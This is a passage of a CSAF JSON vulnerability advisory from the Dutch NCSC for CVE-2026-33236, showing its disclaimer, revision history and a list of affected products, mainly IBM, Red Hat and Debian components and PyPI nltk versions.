{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability to use the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-33236",
        "tracking": {
            "current_release_date": "2026-03-29T16:14:29.210600Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-33236",
            "initial_release_date": "2026-03-19T15:31:30.175913Z",
            "revision_history": [
                {
                    "date": "2026-03-19T15:31:30.175913Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-19T15:31:33.846323Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-20T23:25:58.447521Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-20T23:26:12.947061Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T23:38:59.098553Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-20T23:39:01.841653Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-21T12:44:16.392870Z",
                    "number": "7",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| Products connected (2)."
                },
                {
                    "date": "2026-03-21T12:44:18.910018Z",
                    "number": "8",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-21T15:23:05.981571Z",
                    "number": "9",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-21T15:23:09.489788Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-23T12:30:30.392708Z",
                    "number": "11",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (29).| Product Identifiers created (4).| Product Remediations created (29).| References created (4).| CWES updated (1).| Vendor_assessment created."
                },
                {
                    "date": "2026-03-23T12:30:45.834359Z",
                    "number": "12",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-24T07:48:15.462746Z",
                    "number": "13",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-24T13:49:40.693880Z",
                    "number": "14",
                    "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-24T13:49:44.383400Z",
                    "number": "15",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T18:42:03.444584Z",
                    "number": "16",
                    "summary": "References created (2)."
                },
                {
                    "date": "2026-03-25T18:42:07.180739Z",
                    "number": "17",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-26T00:37:20.885929Z",
                    "number": "18",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (64).| Product Identifiers created (63).| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-27T12:06:50.355299Z",
                    "number": "19",
                    "summary": "Source connected.| CVE status created. (valid)| Products connected (1).| References created (4)."
                },
                {
                    "date": "2026-03-27T12:06:58.081774Z",
                    "number": "20",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-29T03:16:20.488055Z",
                    "number": "21",
                    "summary": "References removed (2)."
                },
                {
                    "date": "2026-03-29T16:14:27.357983Z",
                    "number": "22",
                    "summary": "References created (2)."
                }
            ],
            "status": "interim",
            "version": "22"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<11.6.0",
                                "product": {
                                    "name": "vers:unknown/<11.6.0",
                                    "product_id": "CSAFPID-1189281"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "App Connect Enterprise"
                    }
                ],
                "category": "vendor",
                "name": "IBM"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/unknown",
                                "product": {
                                    "name": "vers:rpm/unknown",
                                    "product_id": "CSAFPID-5474797",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:lightspeed_core"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Lightspeed Core"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/unknown",
                                "product": {
                                    "name": "vers:rpm/unknown",
                                    "product_id": "CSAFPID-2524222",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:openshift_lightspeed"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "OpenShift Lightspeed"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/2",
                                "product": {
                                    "name": "vers:rpm/2",
                                    "product_id": "CSAFPID-1508257",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:ansible_automation_platform:2"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Ansible Automation Platform 2"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/unknown",
                                "product": {
                                    "name": "vers:rpm/unknown",
                                    "product_id": "CSAFPID-1439279",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:openshift_ai"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat OpenShift AI (RHOAI)"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2920384"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "aap-cloud-metrics-collector-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1508263"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "ansible-dev-tools-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5008757"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "ansible-dev-tools-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-3054652"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "ansible-devspaces-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2831632"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "de-minimal-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2831633"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "de-minimal-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1508259"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "de-supported-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-4675946"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "de-supported-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2783920"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "ee-cloud-services-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-3095614"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "ee-minimal-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2698058"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "ee-minimal-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2698059"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "ee-supported-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2518221"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "ee-supported-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2831634"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "lightspeed-chatbot-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5035448"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "lightspeed-chatbot-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Ansible Automation Platform 2"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5222641"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "lightspeed-ocp-rag-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2960939"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "lightspeed-rag-tool-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1508255"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "lightspeed-service-api-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "OpenShift Lightspeed"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5474798"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "lightspeed-stack-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5826731"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "rag-tool-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Lightspeed Core"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-3112099"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-llama-stack-core-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5222767"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-pipeline-runtime-pytorch-llmcompressor-cuda-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5276226"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-ta-lmes-job-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5834017"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-trustyai-nemo-guardrails-server-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5222780"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-jupyter-pytorch-llmcompressor-cuda-py312-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat OpenShift AI (RHOAI)"
                    }
                ],
                "category": "vendor",
                "name": "Red Hat"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:deb/unknown",
                                        "product": {
                                            "name": "vers:deb/unknown",
                                            "product_id": "CSAFPID-1409483"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "nltk"
                            }
                        ],
                        "category": "product_family",
                        "name": "bookworm"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:deb/unknown",
                                        "product": {
                                            "name": "vers:deb/unknown",
                                            "product_id": "CSAFPID-1409484"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "nltk"
                            }
                        ],
                        "category": "product_family",
                        "name": "bullseye"
                    }
                ],
                "category": "vendor",
                "name": "Debian"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.8",
                                "product": {
                                    "name": "vers:unknown/0.8",
                                    "product_id": "CSAFPID-3249744",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@0.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.9",
                                "product": {
                                    "name": "vers:unknown/0.9",
                                    "product_id": "CSAFPID-3249745",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@0.9"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.9.3",
                                "product": {
                                    "name": "vers:unknown/0.9.3",
                                    "product_id": "CSAFPID-3249746",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@0.9.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.9.4",
                                "product": {
                                    "name": "vers:unknown/0.9.4",
                                    "product_id": "CSAFPID-3249747",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@0.9.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.9.5",
                                "product": {
                                    "name": "vers:unknown/0.9.5",
                                    "product_id": "CSAFPID-3249748",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@0.9.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.9.6",
                                "product": {
                                    "name": "vers:unknown/0.9.6",
                                    "product_id": "CSAFPID-3249749",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@0.9.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.9.7",
                                "product": {
                                    "name": "vers:unknown/0.9.7",
                                    "product_id": "CSAFPID-3249750",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@0.9.7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.9.8",
                                "product": {
                                    "name": "vers:unknown/0.9.8",
                                    "product_id": "CSAFPID-3249751",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@0.9.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.9.9",
                                "product": {
                                    "name": "vers:unknown/0.9.9",
                                    "product_id": "CSAFPID-3249752",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@0.9.9"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.1",
                                "product": {
                                    "name": "vers:unknown/2.0.1",
                                    "product_id": "CSAFPID-477849",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@2.0.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.1rc1",
                                "product": {
                                    "name": "vers:unknown/2.0.1rc1",
                                    "product_id": "CSAFPID-3249753",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@2.0.1rc1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.1rc2-git",
                                "product": {
                                    "name": "vers:unknown/2.0.1rc2-git",
                                    "product_id": "CSAFPID-3249754",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@2.0.1rc2-git"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.1rc3",
                                "product": {
                                    "name": "vers:unknown/2.0.1rc3",
                                    "product_id": "CSAFPID-3249755",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@2.0.1rc3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.1rc4",
                                "product": {
                                    "name": "vers:unknown/2.0.1rc4",
                                    "product_id": "CSAFPID-3249756",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@2.0.1rc4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.2",
                                "product": {
                                    "name": "vers:unknown/2.0.2",
                                    "product_id": "CSAFPID-3249757",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@2.0.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.3",
                                "product": {
                                    "name": "vers:unknown/2.0.3",
                                    "product_id": "CSAFPID-477857",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@2.0.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.4",
                                "product": {
                                    "name": "vers:unknown/2.0.4",
                                    "product_id": "CSAFPID-477865",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@2.0.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.5",
                                "product": {
                                    "name": "vers:unknown/2.0.5",
                                    "product_id": "CSAFPID-3249758",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@2.0.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0b4",
                                "product": {
                                    "name": "vers:unknown/2.0b4",
                                    "product_id": "CSAFPID-3249759",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@2.0b4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0b5",
                                "product": {
                                    "name": "vers:unknown/2.0b5",
                                    "product_id": "CSAFPID-3249760",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@2.0b5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0b6",
                                "product": {
                                    "name": "vers:unknown/2.0b6",
                                    "product_id": "CSAFPID-3249761",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@2.0b6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0b7",
                                "product": {
                                    "name": "vers:unknown/2.0b7",
                                    "product_id": "CSAFPID-3249762",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@2.0b7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0b8",
                                "product": {
                                    "name": "vers:unknown/2.0b8",
                                    "product_id": "CSAFPID-3249763",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@2.0b8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0b9",
                                "product": {
                                    "name": "vers:unknown/2.0b9",
                                    "product_id": "CSAFPID-3249764",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@2.0b9"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.0.0",
                                "product": {
                                    "name": "vers:unknown/3.0.0",
                                    "product_id": "CSAFPID-477852",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.0.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.0.0b1",
                                "product": {
                                    "name": "vers:unknown/3.0.0b1",
                                    "product_id": "CSAFPID-3249765",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.0.0b1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.0.0b2",
                                "product": {
                                    "name": "vers:unknown/3.0.0b2",
                                    "product_id": "CSAFPID-3249766",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.0.0b2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.0.1",
                                "product": {
                                    "name": "vers:unknown/3.0.1",
                                    "product_id": "CSAFPID-477846",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.0.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.0.2",
                                "product": {
                                    "name": "vers:unknown/3.0.2",
                                    "product_id": "CSAFPID-477861",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.0.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.0.3",
                                "product": {
                                    "name": "vers:unknown/3.0.3",
                                    "product_id": "CSAFPID-477847",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.0.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.0.4",
                                "product": {
                                    "name": "vers:unknown/3.0.4",
                                    "product_id": "CSAFPID-477853",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.0.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.0.5",
                                "product": {
                                    "name": "vers:unknown/3.0.5",
                                    "product_id": "CSAFPID-477864",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.0.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.1",
                                "product": {
                                    "name": "vers:unknown/3.1",
                                    "product_id": "CSAFPID-477854",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.2",
                                "product": {
                                    "name": "vers:unknown/3.2",
                                    "product_id": "CSAFPID-477859",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.2.1",
                                "product": {
                                    "name": "vers:unknown/3.2.1",
                                    "product_id": "CSAFPID-477850",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.2.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.2.2",
                                "product": {
                                    "name": "vers:unknown/3.2.2",
                                    "product_id": "CSAFPID-477862",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.2.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.2.3",
                                "product": {
                                    "name": "vers:unknown/3.2.3",
                                    "product_id": "CSAFPID-477855",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.2.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.2.4",
                                "product": {
                                    "name": "vers:unknown/3.2.4",
                                    "product_id": "CSAFPID-477858",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.2.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.2.5",
                                "product": {
                                    "name": "vers:unknown/3.2.5",
                                    "product_id": "CSAFPID-477856",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.2.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.3",
                                "product": {
                                    "name": "vers:unknown/3.3",
                                    "product_id": "CSAFPID-477848",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.4",
                                "product": {
                                    "name": "vers:unknown/3.4",
                                    "product_id": "CSAFPID-477860",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.4.1",
                                "product": {
                                    "name": "vers:unknown/3.4.1",
                                    "product_id": "CSAFPID-477866",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.4.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.4.2",
                                "product": {
                                    "name": "vers:unknown/3.4.2",
                                    "product_id": "CSAFPID-3249767",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.4.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.4.3",
                                "product": {
                                    "name": "vers:unknown/3.4.3",
                                    "product_id": "CSAFPID-477863",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.4.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.4.4",
                                "product": {
                                    "name": "vers:unknown/3.4.4",
                                    "product_id": "CSAFPID-477851",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.4.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.4.5",
                                "product": {
                                    "name": "vers:unknown/3.4.5",
                                    "product_id": "CSAFPID-710861",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.4.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.5",
                                "product": {
                                    "name": "vers:unknown/3.5",
                                    "product_id": "CSAFPID-710860",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.5b1",
                                "product": {
                                    "name": "vers:unknown/3.5b1",
                                    "product_id": "CSAFPID-3249768",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.5b1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.6",
                                "product": {
                                    "name": "vers:unknown/3.6",
                                    "product_id": "CSAFPID-710863",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.6.1",
                                "product": {
                                    "name": "vers:unknown/3.6.1",
                                    "product_id": "CSAFPID-710862",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.6.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.6.2",
                                "product": {
                                    "name": "vers:unknown/3.6.2",
                                    "product_id": "CSAFPID-710864",
